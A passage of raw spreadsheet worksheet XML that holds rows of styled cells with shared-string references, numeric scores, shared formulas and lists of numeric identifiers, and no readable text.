      </c>
      <c r="HP43" s="93">
        <v>3.0</v>
      </c>
      <c r="HQ43" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR43" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS43" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT43" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU43" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV43" s="119" t="s">
        <v>929</v>
      </c>
      <c r="HW43" s="119">
        <v>3.0</v>
      </c>
      <c r="HX43" s="119">
        <v>21.0</v>
      </c>
      <c r="HY43" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ43" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA43" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB43" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC43" s="120" t="s">
        <v>930</v>
      </c>
      <c r="ID43" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE43" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF43" s="120" t="s">
        <v>929</v>
      </c>
      <c r="IG43" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH43" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II43" s="99" t="s">
        <v>931</v>
      </c>
      <c r="IJ43" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK43" s="99">
        <v>13.0</v>
      </c>
      <c r="IL43" s="99">
        <v>0.0</v>
      </c>
      <c r="IM43" s="121">
        <f t="shared" si="93"/>
        <v>0</v>
      </c>
      <c r="IN43" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO43" s="98">
        <v>0.0</v>
      </c>
      <c r="IP43" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ43" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR43" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS43" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT43" s="127"/>
      <c r="IU43" s="127"/>
      <c r="IV43" s="127"/>
      <c r="IW43" s="127"/>
      <c r="IX43" s="127"/>
      <c r="IY43" s="127"/>
      <c r="IZ43" s="127"/>
      <c r="JA43" s="127"/>
      <c r="JB43" s="127"/>
      <c r="JC43" s="127"/>
      <c r="JD43" s="127"/>
      <c r="JE43" s="127"/>
      <c r="JF43" s="127"/>
      <c r="JG43" s="127"/>
      <c r="JH43" s="127"/>
      <c r="JI43" s="127"/>
      <c r="JJ43" s="127"/>
      <c r="JK43" s="127"/>
      <c r="JL43" s="127"/>
      <c r="JM43" s="127"/>
      <c r="JN43" s="127"/>
      <c r="JO43" s="127"/>
      <c r="JP43" s="127"/>
      <c r="JQ43" s="127"/>
      <c r="JR43" s="127"/>
      <c r="JS43" s="127"/>
      <c r="JT43" s="127"/>
      <c r="JU43" s="127"/>
      <c r="JV43" s="127"/>
      <c r="JW43" s="127"/>
      <c r="JX43" s="127"/>
      <c r="JY43" s="127"/>
      <c r="JZ43" s="127"/>
      <c r="KA43" s="127"/>
      <c r="KB43" s="127"/>
      <c r="KC43" s="127"/>
      <c r="KD43" s="127"/>
      <c r="KE43" s="127"/>
      <c r="KF43" s="127"/>
      <c r="KG43" s="127"/>
      <c r="KH43" s="127"/>
      <c r="KI43" s="127"/>
      <c r="KJ43" s="127"/>
      <c r="KK43" s="127"/>
      <c r="KL43" s="127"/>
      <c r="KM43" s="127"/>
      <c r="KN43" s="127"/>
      <c r="KO43" s="127"/>
      <c r="KP43" s="127"/>
      <c r="KQ43" s="127"/>
      <c r="KR43" s="127"/>
      <c r="KS43" s="127"/>
      <c r="KT43" s="127"/>
      <c r="KU43" s="127"/>
      <c r="KV43" s="127"/>
      <c r="KW43" s="127"/>
      <c r="KX43" s="127"/>
      <c r="KY43" s="127"/>
      <c r="KZ43" s="127"/>
      <c r="LA43" s="127"/>
      <c r="LB43" s="127"/>
      <c r="LC43" s="127"/>
      <c r="LD43" s="127"/>
      <c r="LE43" s="127"/>
      <c r="LF43" s="127"/>
      <c r="LG43" s="127"/>
      <c r="LH43" s="127"/>
      <c r="LI43" s="127"/>
      <c r="LJ43" s="127"/>
      <c r="LK43" s="127"/>
      <c r="LL43" s="127"/>
      <c r="LM43" s="127"/>
      <c r="LN43" s="127"/>
      <c r="LO43" s="127"/>
      <c r="LP43" s="127"/>
      <c r="LQ43" s="127"/>
      <c r="LR43" s="127"/>
      <c r="LS43" s="127"/>
      <c r="LT43" s="127"/>
      <c r="LU43" s="127"/>
      <c r="LV43" s="127"/>
      <c r="LW43" s="127"/>
      <c r="LX43" s="127"/>
      <c r="LY43" s="127"/>
      <c r="LZ43" s="127"/>
      <c r="MA43" s="127"/>
      <c r="MB43" s="127"/>
      <c r="MC43" s="127"/>
      <c r="MD43" s="127"/>
      <c r="ME43" s="127"/>
      <c r="MF43" s="127"/>
      <c r="MG43" s="127"/>
      <c r="MH43" s="127"/>
      <c r="MI43" s="127"/>
      <c r="MJ43" s="127"/>
      <c r="MK43" s="127"/>
      <c r="ML43" s="127"/>
      <c r="MM43" s="127"/>
      <c r="MN43" s="127"/>
      <c r="MO43" s="127"/>
      <c r="MP43" s="127"/>
      <c r="MQ43" s="127"/>
      <c r="MR43" s="127"/>
      <c r="MS43" s="127"/>
      <c r="MT43" s="127"/>
      <c r="MU43" s="127"/>
      <c r="MV43" s="127"/>
      <c r="MW43" s="127"/>
      <c r="MX43" s="127"/>
      <c r="MY43" s="127"/>
      <c r="MZ43" s="127"/>
      <c r="NA43" s="127"/>
      <c r="NB43" s="127"/>
      <c r="NC43" s="127"/>
      <c r="ND43" s="127"/>
      <c r="NE43" s="127"/>
      <c r="NF43" s="127"/>
      <c r="NG43" s="127"/>
      <c r="NH43" s="127"/>
      <c r="NI43" s="127"/>
      <c r="NJ43" s="127"/>
      <c r="NK43" s="127"/>
      <c r="NL43" s="127"/>
      <c r="NM43" s="127"/>
      <c r="NN43" s="127"/>
      <c r="NO43" s="127"/>
      <c r="NP43" s="127"/>
      <c r="NQ43" s="127"/>
      <c r="NR43" s="127"/>
      <c r="NS43" s="127"/>
      <c r="NT43" s="127"/>
      <c r="NU43" s="127"/>
      <c r="NV43" s="127"/>
      <c r="NW43" s="127"/>
      <c r="NX43" s="127"/>
      <c r="NY43" s="127"/>
    </row>
    <row r="44" ht="153.75" customHeight="1">
      <c r="B44" s="89" t="s">
        <v>209</v>
      </c>
      <c r="C44" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D44" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E44" s="90" t="s">
        <v>932</v>
      </c>
      <c r="F44" s="90" t="s">
        <v>933</v>
      </c>
      <c r="G44" s="90" t="s">
        <v>934</v>
      </c>
      <c r="H44" s="90" t="s">
        <v>935</v>
      </c>
      <c r="I44" s="92" t="s">
        <v>936</v>
      </c>
      <c r="J44" s="92" t="s">
        <v>937</v>
      </c>
      <c r="K44" s="92" t="s">
        <v>938</v>
      </c>
      <c r="L44" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M44" s="93">
        <v>10.0</v>
      </c>
      <c r="N44" s="93">
        <v>5.0</v>
      </c>
      <c r="O44" s="93">
        <v>1.0</v>
      </c>
      <c r="P44" s="93">
        <v>5.0</v>
      </c>
      <c r="Q44" s="93">
        <v>5.0</v>
      </c>
      <c r="R44" s="93">
        <v>5.0</v>
      </c>
      <c r="S44" s="93">
        <v>0.0</v>
      </c>
      <c r="T44" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U44" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V44" s="96" t="s">
        <v>939</v>
      </c>
      <c r="W44" s="96" t="s">
        <v>940</v>
      </c>
      <c r="X44" s="126" t="s">
        <v>941</v>
      </c>
      <c r="Y44" s="126" t="s">
        <v>942</v>
      </c>
      <c r="Z44" s="132" t="s">
        <v>943</v>
      </c>
      <c r="AA44" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB44" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC44" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD44" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE44" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF44" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG44" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH44" s="99" t="s">
        <v>944</v>
      </c>
      <c r="AI44" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ44" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL44" s="100">
        <v>0.0</v>
      </c>
      <c r="AM44" s="100">
        <v>0.0</v>
      </c>
      <c r="AN44" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP44" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ44" s="100">
        <v>0.0</v>
      </c>
      <c r="AR44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT44" s="100" t="str">
        <f t="shared" si="89"/>
        <v>-</v>
      </c>
      <c r="AU44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX44" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY44" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ44" s="100">
        <v>0.0</v>
      </c>
      <c r="BA44" s="102">
        <v>10.0</v>
      </c>
      <c r="BB44" s="102">
        <v>0.0</v>
      </c>
      <c r="BC44" s="102">
        <v>0.0</v>
      </c>
      <c r="BD44" s="102">
        <v>0.0</v>
      </c>
      <c r="BE44" s="102">
        <v>0.0</v>
      </c>
      <c r="BF44" s="102">
        <v>0.0</v>
      </c>
      <c r="BG44" s="102">
        <v>0.0</v>
      </c>
      <c r="BH44" s="102">
        <v>0.0</v>
      </c>
      <c r="BI44" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ44" s="102">
        <v>0.0</v>
      </c>
      <c r="BK44" s="102">
        <v>0.0</v>
      </c>
      <c r="BL44" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM44" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN44" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO44" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP44" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ44" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR44" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS44" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT44" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU44" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV44" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW44" s="104" t="s">
        <v>945</v>
      </c>
      <c r="BX44" s="104">
        <v>3.0</v>
      </c>
      <c r="BY44" s="104">
        <v>11.0</v>
      </c>
      <c r="BZ44" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA44" s="104" t="s">
        <v>945</v>
      </c>
      <c r="CB44" s="104">
        <v>3.0</v>
      </c>
      <c r="CC44" s="104">
        <v>11.0</v>
      </c>
      <c r="CD44" s="104" t="s">
        <v>945</v>
      </c>
      <c r="CE44" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF44" s="104" t="str">
        <f t="shared" si="90"/>
        <v>2000418, 2034567, 2013028</v>
      </c>
      <c r="CG44" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH44" s="104" t="s">
        <v>945</v>
      </c>
      <c r="CI44" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ44" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK44" s="104">
        <v>0.0</v>
      </c>
      <c r="CL44" s="104">
        <v>0.0</v>
      </c>
      <c r="CM44" s="105">
        <v>9.0</v>
      </c>
      <c r="CN44" s="105">
        <v>6.0</v>
      </c>
      <c r="CO44" s="105">
        <v>6.0</v>
      </c>
      <c r="CP44" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ44" s="105">
        <v>11.0</v>
      </c>
      <c r="CR44" s="105">
        <v>11.0</v>
      </c>
      <c r="CS44" s="105">
        <v>0.0</v>
      </c>
      <c r="CT44" s="105">
        <v>0.0</v>
      </c>
      <c r="CU44" s="105">
        <v>0.0</v>
      </c>
      <c r="CV44" s="105">
        <v>0.0</v>
      </c>
      <c r="CW44" s="105">
        <v>6.0</v>
      </c>
      <c r="CX44" s="105">
        <v>6.0</v>
      </c>
      <c r="CY44" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ44" s="105">
        <v>11.0</v>
      </c>
      <c r="DA44" s="105">
        <v>11.0</v>
      </c>
      <c r="DB44" s="106">
        <f t="shared" si="15"/>
        <v>1.2</v>
      </c>
      <c r="DC44" s="106">
        <f t="shared" si="16"/>
        <v>1.2</v>
      </c>
      <c r="DD44" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE44" s="106">
        <f t="shared" si="18"/>
        <v>1.2</v>
      </c>
      <c r="DF44" s="106">
        <f t="shared" si="19"/>
        <v>1.2</v>
      </c>
      <c r="DG44" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH44" s="106">
        <f t="shared" si="21"/>
        <v>2.2</v>
      </c>
      <c r="DI44" s="106">
        <f t="shared" si="22"/>
        <v>2.2</v>
      </c>
      <c r="DJ44" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK44" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL44" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM44" s="108" t="s">
        <v>946</v>
      </c>
      <c r="DN44" s="108">
        <v>4.0</v>
      </c>
      <c r="DO44" s="108">
        <v>16.0</v>
      </c>
      <c r="DP44" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ44" s="108" t="s">
        <v>946</v>
      </c>
      <c r="DR44" s="108">
        <v>4.0</v>
      </c>
      <c r="DS44" s="108">
        <v>16.0</v>
      </c>
      <c r="DT44" s="108" t="s">
        <v>946</v>
      </c>
      <c r="DU44" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV44" s="108" t="str">
        <f t="shared" si="91"/>
        <v>2000418, 2034567, 2013028, 50447</v>
      </c>
      <c r="DW44" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX44" s="108" t="s">
        <v>946</v>
      </c>
      <c r="DY44" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ44" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA44" s="108">
        <v>0.0</v>
      </c>
      <c r="EB44" s="108">
        <v>0.0</v>
      </c>
      <c r="EC44" s="109">
        <v>10.0</v>
      </c>
      <c r="ED44" s="109">
        <v>6.0</v>
      </c>
      <c r="EE44" s="109">
        <v>7.0</v>
      </c>
      <c r="EF44" s="109">
        <v>5.0</v>
      </c>
      <c r="EG44" s="109">
        <v>11.0</v>
      </c>
      <c r="EH44" s="109">
        <v>16.0</v>
      </c>
      <c r="EI44" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ44" s="109">
        <v>0.0</v>
      </c>
      <c r="EK44" s="109">
        <v>0.0</v>
      </c>
      <c r="EL44" s="109">
        <v>0.0</v>
      </c>
      <c r="EM44" s="109">
        <v>6.0</v>
      </c>
      <c r="EN44" s="109">
        <v>7.0</v>
      </c>
      <c r="EO44" s="109">
        <v>5.0</v>
      </c>
      <c r="EP44" s="109">
        <v>11.0</v>
      </c>
      <c r="EQ44" s="109">
        <v>16.0</v>
      </c>
      <c r="ER44" s="110">
        <f t="shared" si="27"/>
        <v>1.2</v>
      </c>
      <c r="ES44" s="110">
        <f t="shared" si="28"/>
        <v>1.2</v>
      </c>
      <c r="ET44" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU44" s="110">
        <f t="shared" si="30"/>
        <v>1.4</v>
      </c>
      <c r="EV44" s="110">
        <f t="shared" si="31"/>
        <v>1.4</v>
      </c>
      <c r="EW44" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX44" s="110">
        <f t="shared" si="33"/>
        <v>3.2</v>
      </c>
      <c r="EY44" s="110">
        <f t="shared" si="34"/>
        <v>3.2</v>
      </c>
      <c r="EZ44" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA44" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB44" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC44" s="111" t="s">
        <v>947</v>
      </c>
      <c r="FD44" s="111">
        <v>9.0</v>
      </c>
      <c r="FE44" s="111">
        <v>29.0</v>
      </c>
      <c r="FF44" s="101" t="s">
        <v>578</v>
      </c>
      <c r="FG44" s="111" t="s">
        <v>948</v>
      </c>
      <c r="FH44" s="111">
        <v>6.0</v>
      </c>
      <c r="FI44" s="111">
        <v>24.0</v>
      </c>
      <c r="FJ44" s="111" t="s">
        <v>947</v>
      </c>
      <c r="FK44" s="111" t="s">
        <v>578</v>
      </c>
      <c r="FL44" s="111" t="str">
        <f t="shared" si="69"/>
        <v>50447, 2002752, 2002749, 2000418, 2011803, 2101620, 2034567, 2013028, 2002824
</v>
      </c>
      <c r="FM44" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN44" s="111" t="s">
        <v>947</v>
      </c>
      <c r="FO44" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP44" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ44" s="111">
        <v>0.0</v>
      </c>
      <c r="FR44" s="111">
        <v>0.0</v>
      </c>
      <c r="FS44" s="112">
        <v>9.0</v>
      </c>
      <c r="FT44" s="112">
        <v>6.0</v>
      </c>
      <c r="FU44" s="112">
        <v>13.0</v>
      </c>
      <c r="FV44" s="112">
        <v>5.0</v>
      </c>
      <c r="FW44" s="112">
        <v>24.0</v>
      </c>
      <c r="FX44" s="112">
        <v>29.0</v>
      </c>
      <c r="FY44" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ44" s="112">
        <v>0.0</v>
      </c>
      <c r="GA44" s="112">
        <v>0.0</v>
      </c>
      <c r="GB44" s="112">
        <v>0.0</v>
      </c>
      <c r="GC44" s="112">
        <v>6.0</v>
      </c>
      <c r="GD44" s="112">
        <v>10.0</v>
      </c>
      <c r="GE44" s="112">
        <v>5.0</v>
      </c>
      <c r="GF44" s="112">
        <v>19.0</v>
      </c>
      <c r="GG44" s="112">
        <v>24.0</v>
      </c>
      <c r="GH44" s="113">
        <f t="shared" si="39"/>
        <v>1.2</v>
      </c>
      <c r="GI44" s="113">
        <f t="shared" si="40"/>
        <v>1.2</v>
      </c>
      <c r="GJ44" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK44" s="113">
        <f t="shared" si="42"/>
        <v>2.6</v>
      </c>
      <c r="GL44" s="113">
        <f t="shared" si="43"/>
        <v>2</v>
      </c>
      <c r="GM44" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN44" s="113">
        <f t="shared" si="45"/>
        <v>5.8</v>
      </c>
      <c r="GO44" s="113">
        <f t="shared" si="46"/>
        <v>4.8</v>
      </c>
      <c r="GP44" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ44" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR44" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS44" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT44" s="94" t="s">
        <v>949</v>
      </c>
      <c r="GU44" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV44" s="116">
        <v>1.0</v>
      </c>
      <c r="GW44" s="116">
        <v>1.0</v>
      </c>
      <c r="GX44" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY44" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ44" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA44" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB44" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC44" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD44" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE44" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF44" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG44" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH44" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI44" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ44" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK44" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL44" s="93">
        <v>9.0</v>
      </c>
      <c r="HM44" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN44" s="93">
        <v>0.0</v>
      </c>
      <c r="HO44" s="93">
        <v>0.0</v>
      </c>
      <c r="HP44" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ44" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR44" s="118">
        <f t="shared" si="54"/>
        <v>0.1666666667</v>
      </c>
      <c r="HS44" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT44" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU44" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV44" s="119">
        <v>9999.0</v>
      </c>
      <c r="HW44" s="119">
        <v>1.0</v>
      </c>
      <c r="HX44" s="119">
        <v>5.0</v>
      </c>
      <c r="HY44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID44" s="120">
        <v>9999.0</v>
      </c>
      <c r="IE44" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH44" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II44" s="99" t="s">
        <v>950</v>
      </c>
      <c r="IJ44" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK44" s="99">
        <v>5.0</v>
      </c>
      <c r="IL44" s="99">
        <v>5.0</v>
      </c>
      <c r="IM44" s="121">
        <f t="shared" si="93"/>
        <v>5</v>
      </c>
      <c r="IN44" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO44" s="98">
        <v>5.0</v>
      </c>
      <c r="IP44" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ44" s="118">
        <f t="shared" si="59"/>
        <v>0.8333333333</v>
      </c>
      <c r="IR44" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS44" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT44" s="127"/>
      <c r="IU44" s="127"/>
      <c r="IV44" s="127"/>
      <c r="IW44" s="127"/>
      <c r="IX44" s="127"/>
      <c r="IY44" s="127"/>
      <c r="IZ44" s="127"/>
      <c r="JA44" s="127"/>
      <c r="JB44" s="127"/>
      <c r="JC44" s="127"/>
      <c r="JD44" s="127"/>
      <c r="JE44" s="127"/>
      <c r="JF44" s="127"/>
      <c r="JG44" s="127"/>
      <c r="JH44" s="127"/>
      <c r="JI44" s="127"/>
      <c r="JJ44" s="127"/>
      <c r="JK44" s="127"/>
      <c r="JL44" s="127"/>
      <c r="JM44" s="127"/>
      <c r="JN44" s="127"/>
      <c r="JO44" s="127"/>
      <c r="JP44" s="127"/>
      <c r="JQ44" s="127"/>
      <c r="JR44" s="127"/>
      <c r="JS44" s="127"/>
      <c r="JT44" s="127"/>
      <c r="JU44" s="127"/>
      <c r="JV44" s="127"/>
      <c r="JW44" s="127"/>
      <c r="JX44" s="127"/>
      <c r="JY44" s="127"/>
      <c r="JZ44" s="127"/>
      <c r="KA44" s="127"/>
      <c r="KB44" s="127"/>
      <c r="KC44" s="127"/>
      <c r="KD44" s="127"/>
      <c r="KE44" s="127"/>
      <c r="KF44" s="127"/>
      <c r="KG44" s="127"/>
      <c r="KH44" s="127"/>
      <c r="KI44" s="127"/>
      <c r="KJ44" s="127"/>
      <c r="KK44" s="127"/>
      <c r="KL44" s="127"/>
      <c r="KM44" s="127"/>
      <c r="KN44" s="127"/>
      <c r="KO44" s="127"/>
      <c r="KP44" s="127"/>
      <c r="KQ44" s="127"/>
      <c r="KR44" s="127"/>
      <c r="KS44" s="127"/>
      <c r="KT44" s="127"/>
      <c r="KU44" s="127"/>
      <c r="KV44" s="127"/>
      <c r="KW44" s="127"/>
      <c r="KX44" s="127"/>
      <c r="KY44" s="127"/>
      <c r="KZ44" s="127"/>
      <c r="LA44" s="127"/>
      <c r="LB44" s="127"/>
      <c r="LC44" s="127"/>
      <c r="LD44" s="127"/>
      <c r="LE44" s="127"/>
      <c r="LF44" s="127"/>
      <c r="LG44" s="127"/>
      <c r="LH44" s="127"/>
      <c r="LI44" s="127"/>
      <c r="LJ44" s="127"/>
      <c r="LK44" s="127"/>
      <c r="LL44" s="127"/>
      <c r="LM44" s="127"/>
      <c r="LN44" s="127"/>
      <c r="LO44" s="127"/>
      <c r="LP44" s="127"/>
      <c r="LQ44" s="127"/>
      <c r="LR44" s="127"/>
      <c r="LS44" s="127"/>
      <c r="LT44" s="127"/>
      <c r="LU44" s="127"/>
      <c r="LV44" s="127"/>
      <c r="LW44" s="127"/>
      <c r="LX44" s="127"/>
      <c r="LY44" s="127"/>
      <c r="LZ44" s="127"/>
      <c r="MA44" s="127"/>
      <c r="MB44" s="127"/>
      <c r="MC44" s="127"/>
      <c r="MD44" s="127"/>
      <c r="ME44" s="127"/>
      <c r="MF44" s="127"/>
      <c r="MG44" s="127"/>
      <c r="MH44" s="127"/>
      <c r="MI44" s="127"/>
      <c r="MJ44" s="127"/>
      <c r="MK44" s="127"/>
      <c r="ML44" s="127"/>
      <c r="MM44" s="127"/>
      <c r="MN44" s="127"/>
      <c r="MO44" s="127"/>
      <c r="MP44" s="127"/>
      <c r="MQ44" s="127"/>
      <c r="MR44" s="127"/>
      <c r="MS44" s="127"/>
      <c r="MT44" s="127"/>
      <c r="MU44" s="127"/>
      <c r="MV44" s="127"/>
      <c r="MW44" s="127"/>
      <c r="MX44" s="127"/>
      <c r="MY44" s="127"/>
      <c r="MZ44" s="127"/>
      <c r="NA44" s="127"/>
      <c r="NB44" s="127"/>
      <c r="NC44" s="127"/>
      <c r="ND44" s="127"/>
      <c r="NE44" s="127"/>
      <c r="NF44" s="127"/>
      <c r="NG44" s="127"/>
      <c r="NH44" s="127"/>
      <c r="NI44" s="127"/>
      <c r="NJ44" s="127"/>
      <c r="NK44" s="127"/>
      <c r="NL44" s="127"/>
      <c r="NM44" s="127"/>
      <c r="NN44" s="127"/>
      <c r="NO44" s="127"/>
      <c r="NP44" s="127"/>
      <c r="NQ44" s="127"/>
      <c r="NR44" s="127"/>
      <c r="NS44" s="127"/>
      <c r="NT44" s="127"/>
      <c r="NU44" s="127"/>
      <c r="NV44" s="127"/>
      <c r="NW44" s="127"/>
      <c r="NX44" s="127"/>
      <c r="NY44" s="127"/>
    </row>
    <row r="45" ht="153.75" customHeight="1">
      <c r="B45" s="89" t="s">
        <v>951</v>
      </c>
      <c r="C45" s="90" t="s">
        <v>633</v>
      </c>
      <c r="D45" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E45" s="90" t="s">
        <v>953</v>
      </c>
      <c r="F45" s="90" t="s">
        <v>954</v>
      </c>
      <c r="G45" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H45" s="151" t="s">
        <v>12</v>
      </c>
      <c r="I45" s="92" t="s">
        <v>955</v>
      </c>
      <c r="J45" s="92" t="s">
        <v>956</v>
      </c>
      <c r="K45" s="92" t="s">
        <v>957</v>
      </c>
      <c r="L45" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M45" s="93">
        <v>32.0</v>
      </c>
      <c r="N45" s="93">
        <v>1.0</v>
      </c>
      <c r="O45" s="93">
        <v>0.0</v>
      </c>
      <c r="P45" s="93">
        <v>1.0</v>
      </c>
      <c r="Q45" s="93">
        <f t="shared" ref="Q45:Q52" si="94">R45+S45</f>
        <v>1</v>
      </c>
      <c r="R45" s="93">
        <v>1.0</v>
      </c>
      <c r="S45" s="93">
        <v>0.0</v>
      </c>
      <c r="T45" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U45" s="95" t="s">
        <v>958</v>
      </c>
      <c r="V45" s="96" t="s">
        <v>959</v>
      </c>
      <c r="W45" s="96" t="s">
        <v>960</v>
      </c>
      <c r="X45" s="97" t="s">
        <v>961</v>
      </c>
      <c r="Y45" s="96" t="s">
        <v>962</v>
      </c>
      <c r="Z45" s="96" t="s">
        <v>963</v>
      </c>
      <c r="AA45" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB45" s="95" t="s">
        <v>224</v>
      </c>
